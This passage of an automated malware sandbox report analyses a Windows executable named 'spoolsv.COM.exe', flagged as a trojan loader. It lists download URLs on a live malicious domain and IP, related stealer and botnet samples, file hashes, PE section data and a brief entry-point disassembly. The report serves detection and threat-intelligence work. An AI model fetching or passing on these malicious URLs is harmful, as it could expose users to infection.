                                              https://swamfoxinnc.com/233_Svcrhpjadgyispoolsv.COM.exe, 00000005.00000003.1841751960.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2152748998.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2466011229.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2049371642.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2083372135.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2118349105.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1875655364.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2015505001.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2186886665.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2221831704.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2257555113.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1737114242.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://swamfoxinnc.com/233_Svcrhpjadgylspoolsv.COM.exe, 00000005.00000003.1668484211.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2221831704.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2186886665.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2152748998.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1600782593.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://swamfoxinnc.com/233_Svcrspoolsv.COM.exe, 00000005.00000002.2530227433.00000000209C3000.00000004.00001000.00020000.00000000.sdmptrue
                                                    unknown
                                                    https://swamfoxinnc.com/233_Svcrhpjadgyjspoolsv.COM.exe, 00000005.00000003.2221831704.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2186886665.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1600782593.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://swamfoxinnc.com/233_SvcrhpjadgyAspoolsv.COM.exe, 00000005.00000003.2362712355.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2466011229.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2186886665.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://swamfoxinnc.com/233_SvcrhpjadgyIvspoolsv.COM.exe, 00000005.00000002.2512765082.0000000000566000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://www.aapanel.com/new/download.html?invite_code=aapanelespoolsv.COM.exe, 00000005.00000003.2081446105.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1424107287.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1908555054.00000000216B6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2015374252.0000000021692000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1839665207.00000000216B2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1735009336.000000002166F000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2323851649.00000000216F3000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1424434949.00000000216AB000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2289596193.000000002169F000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1666608167.0000000021670000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1354494044.000000002167C000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1805561761.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1424226209.0000000021673000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1464632700.000000002166E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1632731035.00000000216C7000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1496784556.0000000021675000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1426618232.0000000021661000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2184812774.00000000216B6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1354494044.00000000216B5000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291723825.000000002169A000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1320809972.00000000005D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://swamfoxinnc.com/233_Svcrhpjadgy~spoolsv.COM.exe, 00000005.00000003.2466011229.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2083372135.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2118349105.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://swamfoxinnc.com/233_SvcrhpjadgyDspoolsv.COM.exe, 00000005.00000002.2512765082.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://swamfoxinnc.com:443/233_Svcrhpjadgyjspoolsv.COM.exe, 00000005.00000003.2396794289.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://swamfoxinnc.com/?spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://swamfoxinnc.com/233_Svcrhpjadgy8spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://swamfoxinnc.com/233_Svcrhpjadgy6spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://swamfoxinnc.com/rxspoolsv.COM.exe, 00000005.00000003.2466011229.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2049371642.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1499063783.00000000005C2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2257555113.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1980977994.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1356542930.00000000005C2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2083372135.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2221831704.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1668484211.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1464707281.00000000005C2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1702373874.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2118349105.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1807574988.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          176.123.5.143
                                                                          swamfoxinnc.comMoldova Republic of
                                                                          200019ALEXHOSTMDtrue
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1579692
                                                                          Start date and time:2024-12-23 07:36:43 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 5m 31s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:12
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:spoolsv.COM.exe
                                                                          Detection:MAL
                                                                          Classification:mal88.troj.evad.winEXE@1/0@1/1
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 99%
                                                                          • Number of executed functions: 23
                                                                          • Number of non-executed functions: 39
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          TimeTypeDescription
                                                                          01:37:36API Interceptor36x Sleep call for process: spoolsv.COM.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          176.123.5.143Svcrhpjadgyclc.cmdGet hashmaliciousDBatLoaderBrowse
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            swamfoxinnc.comSvcrhpjadgyclc.cmdGet hashmaliciousDBatLoaderBrowse
                                                                            • 176.123.5.143
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            ALEXHOSTMDrun.exeGet hashmaliciousUnknownBrowse
                                                                            • 91.208.206.195
                                                                            em_webdev_assignment_dec2024.docGet hashmaliciousUnknownBrowse
                                                                            • 91.208.206.195
                                                                            Svcrhpjadgyclc.cmdGet hashmaliciousDBatLoaderBrowse
                                                                            • 176.123.5.143
                                                                            armv6l.elfGet hashmaliciousUnknownBrowse
                                                                            • 45.84.8.182
                                                                            NLRpif3sEB.exeGet hashmaliciousUnknownBrowse
                                                                            • 213.226.100.197
                                                                            NLRpif3sEB.exeGet hashmaliciousUnknownBrowse
                                                                            • 213.226.100.197
                                                                            sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                            • 176.123.5.14
                                                                            http://server.citierupticx.com/specId/product-mje%EF%BC%A0ml.avio.co.jpGet hashmaliciousHTMLPhisherBrowse
                                                                            • 91.208.197.216
                                                                            2024-11 eStmt 5563019.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                            • 176.123.1.130
                                                                            otis.exeGet hashmaliciousUnknownBrowse
                                                                            • 91.132.92.231
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            a0e9f5d64349fb13191bc781f81f42e1pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                            • 176.123.5.143
                                                                            5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                            • 176.123.5.143
                                                                            xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                            • 176.123.5.143
                                                                            schost.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 176.123.5.143
                                                                            5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                            • 176.123.5.143
                                                                            s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                            • 176.123.5.143
                                                                            TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                            • 176.123.5.143
                                                                            9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                            • 176.123.5.143
                                                                            0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                            • 176.123.5.143
                                                                            20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                            • 176.123.5.143
                                                                            No context
                                                                            No created / dropped files found
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.012102322841487
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:spoolsv.COM.exe
                                                                            File size:1'019'392 bytes
                                                                            MD5:dfd15a4158ab979660435d6f3e95a3ec
                                                                            SHA1:6d5566cddfb4b99e82a6babdbd4536a24e8f6f73
                                                                            SHA256:baa12b649fddd77ef62ecd2b3169fab9bb5fbe78404175485f9a7fb48dc4456d
                                                                            SHA512:f33677b419f307c8970c0024e45162bc83e63141878ec2d15b59011261cb30aa412076b62b80fd4e9b99713a689c10699ea8682f67754b2569c83b22b1225e02
                                                                            SSDEEP:24576:Mt8U4ln77mcFj7LF6iNQj0KyEB1zcwfPM6d:0wnRQj0KyEB1zcwfPMA
                                                                            TLSH:34259E33E0506A35CD16D5BC0C73D6BC541ABD323F27AC87E6A16D58BE39B986C28193
                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                            Icon Hash:1f7effffffffff3f
                                                                            Entrypoint:0x473804
                                                                            Entrypoint Section:.itext
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                            DLL Characteristics:
                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:c8740fc6ceabb3b749c3b5b31246f4e4
                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFF0h
                                                                            mov eax, 00472770h
                                                                            call 00007FA904498CE1h
                                                                            mov eax, dword ptr [004E066Ch]
                                                                            mov eax, dword ptr [eax]
                                                                            call 00007FA9044EAEE5h
                                                                            mov ecx, dword ptr [004E0764h]
                                                                            mov eax, dword ptr [004E066Ch]
                                                                            mov eax, dword ptr [eax]
                                                                            mov edx, dword ptr [0047233Ch]
                                                                            call 00007FA9044EAEE5h
                                                                            mov eax, dword ptr [004E066Ch]
                                                                            mov eax, dword ptr [eax]
                                                                            call 00007FA9044EAF59h
                                                                            call 00007FA904496CCCh
                                                                            lea eax, dword ptr [eax+00h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xe50000x26b6.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf10000x10400.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000x6e8c.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xe90000x18.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xe571c0x604.idata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x719c00x71a00c20c03fd36d5c6a0f5f2d60e61342924False0.5268796410891089data6.554263214536427IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .itext0x730000x84c0xa00e9a65ab665fe60801328ffc6f137da75False0.527734375data5.5780106542915835IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .data0x740000x6c8000x6c80044ad69def854a892113c20f96a1e8921False0.38891939084101385data6.615175418760923IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .bss0xe10000x36b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata0xe50000x26b60x28001ccb97a5a4355e75c3a3fc645dd0b749False0.309765625data4.905692986550938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .tls0xe80000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rdata0xe90000x180x200aaefc7498fcb77b5ed918f8d25bd6004False0.05078125data0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0xea0000x6e8c0x7000337ed535b030e2648bb3b67f6124d43dFalse0.6292898995535714data6.663115031589674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0xf10000x104000x10400780d920e700e79be7d346383e076ef83False0.4636268028846154data6.013951978737078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_CURSOR0xf1b180x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                            RT_CURSOR0xf1c4c0x134dataEnglishUnited States0.4642857142857143
                                                                            RT_CURSOR0xf1d800x134dataEnglishUnited States0.4805194805194805
                                                                            RT_CURSOR0xf1eb40x134dataEnglishUnited States0.38311688311688313
                                                                            RT_CURSOR0xf1fe80x134dataEnglishUnited States0.36038961038961037
                                                                            RT_CURSOR0xf211c0x134dataEnglishUnited States0.4090909090909091
                                                                            RT_CURSOR0xf22500x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                            RT_BITMAP0xf23840x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                            RT_BITMAP0xf25540x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                            RT_BITMAP0xf27380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                            RT_BITMAP0xf29080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                            RT_BITMAP0xf2ad80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                            RT_BITMAP0xf2ca80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                            RT_BITMAP0xf2e780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                            RT_BITMAP0xf30480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                            RT_BITMAP0xf32180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                            RT_BITMAP0xf33e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                            RT_BITMAP0xf35b80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                            RT_ICON0xf36a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m0.4228723404255319
                                                                            RT_ICON0xf3b080x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m0.29918032786885246
                                                                            RT_ICON0xf44900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m0.2535178236397749
                                                                            RT_ICON0xf55380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.18329875518672198
                                                                            RT_DIALOG0xf7ae00x52data0.7682926829268293
                                                                            RT_DIALOG0xf7b340x52data0.7560975609756098
                                                                            RT_STRING0xf7b880x244data0.46379310344827585
                                                                            RT_STRING0xf7dcc0x188data0.5943877551020408
                                                                            RT_STRING0xf7f540xc8data0.685
                                                                            RT_STRING0xf801c0x118data0.6035714285714285
                                                                            RT_STRING0xf81340x3a8data0.4305555555555556
                                                                            RT_STRING0xf84dc0x3a4data0.38197424892703863
                                                                            RT_STRING0xf88800x370data0.4022727272727273
                                                                            RT_STRING0xf8bf00x3ccdata0.33539094650205764
                                                                            RT_STRING0xf8fbc0x214data0.49624060150375937
                                                                            RT_STRING0xf91d00xccdata0.6274509803921569
                                                                            RT_STRING0xf929c0x194data0.5643564356435643
                                                                            RT_STRING0xf94300x3c4data0.3288381742738589
                                                                            RT_STRING0xf97f40x338data0.42961165048543687
                                                                            RT_STRING0xf9b2c0x294data0.42424242424242425
                                                                            RT_RCDATA0xf9dc00x10data1.5
                                                                            RT_RCDATA0xf9dd00x304data0.7033678756476683
                                                                            RT_RCDATA0xfa0d40x712aDelphi compiled form 'TForm1'0.6897134967207456
                                                                            RT_GROUP_CURSOR0x1012000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                            RT_GROUP_CURSOR0x1012140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                            RT_GROUP_CURSOR0x1012280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x10123c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x1012500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                            RT_GROUP_CURSOR0x1012640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
